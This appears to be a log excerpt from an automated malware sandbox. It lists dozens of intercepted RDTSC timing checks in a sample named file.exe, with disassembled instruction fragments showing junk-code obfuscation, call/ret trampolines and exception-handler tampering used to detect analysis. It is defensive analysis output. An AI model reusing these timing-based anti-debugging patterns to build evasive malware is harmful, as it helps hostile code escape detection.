Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF950F second address: BF958C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F702C87CB98h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ebx, esi 0x00000024 and edi, dword ptr [ebp+122D17FCh] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D34D2h], ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F702C87CB98h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e pushad 0x0000004f xor eax, dword ptr [ebp+122D2983h] 0x00000055 popad 0x00000056 push eax 0x00000057 push edi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F702C87CBA7h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA48F second address: BFA493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA493 second address: BFA4EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F702C87CBA4h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F702C87CB98h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2D38h], edx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 sub dword ptr [ebp+122D2082h], esi 0x0000003b pop ebx 0x0000003c mov bl, ah 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA4EA second address: BFA4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB39B second address: BFB41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F702C87CB98h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 cld 0x00000024 push 00000000h 0x00000026 jmp 00007F702C87CBA8h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F702C87CB98h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 jmp 00007F702C87CB9Bh 0x0000004c jng 00007F702C87CB98h 0x00000052 mov bh, 00h 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 jc 00007F702C87CB96h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB41B second address: BFB441 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F702D6C0E54h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F702D6C0E46h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB441 second address: BFB445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB445 second address: BFB44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB44B second address: BFB456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F702C87CB96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA69B second address: BFA6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC50D second address: BFC511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC511 second address: BFC53D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F702D6C0E50h 0x00000013 jmp 00007F702D6C0E4Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC53D second address: BFC5B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F702C87CB9Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F702C87CB98h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 and edi, 2619E56Ch 0x0000002c add bh, FFFFFF83h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F702C87CB98h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D1B9Ah] 0x00000051 push 00000000h 0x00000053 mov dword ptr [ebp+122D202Dh], edi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push edi 0x0000005f pop edi 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC5B6 second address: BFC5BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC5BC second address: BFC5C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC5C2 second address: BFC5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC5C6 second address: BFC5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD4EF second address: BFD57C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, 4C723146h 0x00000011 sbb bl, FFFFFF84h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F702D6C0E48h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jmp 00007F702D6C0E53h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F702D6C0E48h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 pushad 0x00000052 push edx 0x00000053 add edx, dword ptr [ebp+122D38C4h] 0x00000059 pop edx 0x0000005a mov si, B400h 0x0000005e popad 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD57C second address: BFD586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD586 second address: BFD58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC7AB second address: BFC7B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC7B7 second address: BFC7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC7BB second address: BFC7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD6B2 second address: BFD6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFD6B6 second address: BFD6C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFF44D second address: BFF451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6A9 second address: BFE6AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6AD second address: BFE6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6B3 second address: BFE6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F702C87CB96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6BD second address: BFE6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE77D second address: BFE783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0157D second address: C01583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02537 second address: C02559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F702C87CB96h 0x00000009 jl 00007F702C87CB96h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jnp 00007F702C87CBA4h 0x00000019 pushad 0x0000001a jnc 00007F702C87CB96h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02559 second address: C025CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F702D6C0E48h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 call 00007F702D6C0E56h 0x00000025 mov dword ptr [ebp+1247C490h], esi 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D348Dh], edi 0x00000034 movzx edi, dx 0x00000037 push 00000000h 0x00000039 cmc 0x0000003a mov dword ptr [ebp+122D1BC1h], eax 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 jmp 00007F702D6C0E4Fh 0x00000047 pushad 0x00000048 push eax 0x00000049 pop eax 0x0000004a push esi 0x0000004b pop esi 0x0000004c popad 0x0000004d popad 0x0000004e push eax 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C025CB second address: C025CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01749 second address: C0174D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0174D second address: C01751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01751 second address: C01757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01757 second address: C0177B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F702C87CBA8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0177B second address: C0177F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0177F second address: C017ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr [ebp+122D205Ch], ecx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov dword ptr [ebp+122D1B9Ah], ebx 0x00000026 mov eax, dword ptr [ebp+122D1509h] 0x0000002c jmp 00007F702C87CBA5h 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F702C87CB98h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D35D9h], esi 0x00000053 nop 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 pushad 0x00000058 popad 0x00000059 pop ebx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C017ED second address: C017F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05594 second address: C055A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0073E second address: C00742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C055A7 second address: C0563A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop esi 0x00000010 nop 0x00000011 or dword ptr [ebp+122D2AF2h], edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F702C87CB98h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 stc 0x00000034 jg 00007F702C87CBA7h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007F702C87CB98h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 add ebx, 50BA9D3Ch 0x0000005c mov dword ptr [ebp+122D1934h], edx 0x00000062 xchg eax, esi 0x00000063 push edi 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0563A second address: C0563E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06437 second address: C06467 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F702C87CBA7h 0x00000012 jmp 00007F702C87CBA1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C046CC second address: C047A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor dword ptr [ebp+122D3489h], eax 0x00000012 mov ebx, esi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F702D6C0E48h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov ebx, dword ptr [ebp+122D3870h] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov dword ptr [ebp+122D1AA2h], eax 0x00000048 call 00007F702D6C0E4Ah 0x0000004d jng 00007F702D6C0E5Fh 0x00000053 call 00007F702D6C0E58h 0x00000058 pop ebx 0x00000059 pop ebx 0x0000005a mov eax, dword ptr [ebp+122D1515h] 0x00000060 sub dword ptr [ebp+122D194Fh], ecx 0x00000066 push FFFFFFFFh 0x00000068 push 00000000h 0x0000006a push ebp 0x0000006b call 00007F702D6C0E48h 0x00000070 pop ebp 0x00000071 mov dword ptr [esp+04h], ebp 0x00000075 add dword ptr [esp+04h], 00000019h 0x0000007d inc ebp 0x0000007e push ebp 0x0000007f ret 0x00000080 pop ebp 0x00000081 ret 0x00000082 or ebx, dword ptr [ebp+122D3810h] 0x00000088 and ebx, dword ptr [ebp+122D369Ch] 0x0000008e push eax 0x0000008f push eax 0x00000090 pushad 0x00000091 jmp 00007F702D6C0E57h 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06467 second address: C06507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F702C87CB98h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007F702C87CBA3h 0x00000029 clc 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F702C87CB98h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 pushad 0x00000047 mov eax, dword ptr [ebp+122D3920h] 0x0000004d popad 0x0000004e push 00000000h 0x00000050 mov dword ptr [ebp+122D17DBh], esi 0x00000056 sub bx, 5774h 0x0000005b push eax 0x0000005c pushad 0x0000005d jno 00007F702C87CBA8h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C05743 second address: C057E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr [ebp+122D281Fh], edx 0x00000017 mov dword ptr [ebp+122D202Dh], ebx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F702D6C0E48h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov ebx, dword ptr [ebp+122D37B8h] 0x00000044 mov eax, dword ptr [ebp+122D1571h] 0x0000004a sub ebx, dword ptr [ebp+122D380Ch] 0x00000050 push FFFFFFFFh 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007F702D6C0E48h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 00000016h 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c mov dword ptr [ebp+122D2057h], ebx 0x00000072 nop 0x00000073 jmp 00007F702D6C0E56h 0x00000078 push eax 0x00000079 push ebx 0x0000007a jng 00007F702D6C0E4Ch 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07530 second address: C075B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F702C87CB98h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F702C87CB98h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+124620B1h], edx 0x00000032 push 00000000h 0x00000034 movsx ebx, si 0x00000037 mov ebx, edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F702C87CB98h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push edx 0x00000057 jmp 00007F702C87CBA8h 0x0000005c pop edx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C075B4 second address: C075B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C075B8 second address: C075BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C075BE second address: C075C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B333 second address: C0B339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B339 second address: C0B34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702D6C0E4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B34B second address: C0B34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E60F second address: C0E62A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F702D6C0E55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E62A second address: C0E630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BACD8E second address: BACD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C151AD second address: C151D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F702C87CBA7h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C151D1 second address: C151F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E54h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F702D6C0E46h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C151F9 second address: C151FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
